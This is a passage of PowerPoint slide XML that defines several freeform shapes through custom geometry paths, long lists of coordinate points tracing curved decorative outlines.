                  <a:pt x="148336" y="577206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="537266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="496451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="454798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="412342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="369118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="325163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="280513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="235202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="189267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="142744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="95667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="949" y="4807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2" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11528170" y="3067176"/>
            <a:ext cx="388620" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="388620" h="439420">
                <a:moveTo>
                  <a:pt x="388620" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373125" y="438912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38862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3" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1085850" cy="3133725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="85725" y="3133724"/>
                </a:moveTo>
                <a:close/>
              </a:path>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="1085850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3129904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37270" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85725" y="3133724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134179" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182040" y="3129146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229254" y="3123501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275768" y="3115690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321530" y="3105763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366487" y="3093775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410587" y="3079777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453777" y="3063821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="496006" y="3045960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537220" y="3026247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577367" y="3004733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616396" y="2981472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="654252" y="2956516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690885" y="2929916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726242" y="2901726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760270" y="2871997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="792917" y="2840783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824131" y="2808136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="853859" y="2774107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882048" y="2738750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908647" y="2702117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="933603" y="2664260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956864" y="2625232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978376" y="2585085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998089" y="2543871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1015949" y="2501643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031904" y="2458453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1045902" y="2414354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057890" y="2369398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067816" y="2323638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075627" y="2277126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081271" y="2229913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084696" y="2182054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085850" y="2133600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108585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4" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553260" y="0"/>
            <a:ext cx="2360930" cy="1081405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2360930" h="1081405">
                <a:moveTo>
                  <a:pt x="2360640" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2351430" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2343262" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2333376" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321806" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2308590" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293762" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2277358" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259412" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2239961" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2219041" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2196685" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2172931" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2147812" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121366" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093626" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2064629" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034410" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2003005" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970448" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1936776" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1902023" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866226" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829419" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1791639" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752919" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1713297" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1672807" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631485" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1589366" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546486" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1502880" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458583" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1413632" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1368061" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321905" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275201" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1227984" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1180289" y="1081151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1132593" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085376" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1038673" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992518" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="946948" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901997" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="857702" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814097" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="771219" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729101" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687781" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647293" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607673" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568956" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531177" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494372" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458577" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423827" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390157" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357603" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326200" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295983" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266988" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239251" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212807" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187691" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163938" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141585" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120666" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101217" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83273" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66871" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52044" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38829" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27261" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17376" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9208" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794" y="2844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5" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962150" y="752475"/>
            <a:ext cx="400050" cy="409575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="400050" h="409575">
                <a:moveTo>
                  <a:pt x="200025" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="154155" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154155" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025" y="409575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025"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16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5500623"/>
            <a:ext cx="748030" cy="600710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="600710">
                <a:moveTo>
                  <a:pt x="747711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="745906" y="46903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="92818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="137613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="181153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="223305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="263935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="302911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="340099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="375365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="408577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="439600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="468301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="494548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="518207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="539143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="557225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="572318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="600138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100740" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54831" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10042" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58152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7" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2014473"/>
            <a:ext cx="748030" cy="3486150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="3486150">
                <a:moveTo>
                  <a:pt x="0" y="18615"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10046" y="15852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54834" y="7134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100741" y="1805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="1932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="7258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="15972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="27941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="43031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="61109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="82042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="105696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="131938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="160635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="191654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="224861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="260123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="297306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="336278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="376906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="419054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="462592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="507384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745906" y="553299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="600201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="348615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8" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5567426"/>
            <a:ext cx="938530" cy="790575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="790575">
                <a:moveTo>
                  <a:pt x="938211" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="936768" y="48153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="95543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="142088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="187705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="232312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="275825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="318161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="359239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="398975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="437286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="474091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="509306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="542848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="574635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="604584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="632613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="658638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="682577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="704348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="723867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="741052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="755820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="768088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="790511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99476" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52079" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5528" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="776600"/>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9" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1766823"/>
            <a:ext cx="938530" cy="3801110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="3801110">
                <a:moveTo>
                  <a:pt x="0" y="13911"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5532" y="12737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52082" y="5716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99477" y="1442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="5843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="12864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="22550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="34818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="49586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="66772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="86291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="108062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="132002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="158029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="186059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="216009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="247798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="281343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="316560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="353367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="391682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="431421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="472502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="514843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="558360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="602971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="648594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="695145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936768" y="742542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="790701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="380060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0" name="Freeform 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5624512"/>
            <a:ext cx="1129030" cy="981075"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="981075">
                <a:moveTo>
                  <a:pt x="1128711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1127580" y="47533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="94484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="140798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="186427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="231317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="275417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="318677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="361045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="402469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="442898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="482281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="520566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="557701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="593636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="628319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="661699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="724343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="753505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="781157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="807249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="831730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="854547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="875650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="894987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="912506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="928157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="941888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="953648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="963384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6837" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96989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1" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1509649"/>
            <a:ext cx="1129030" cy="4115435"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
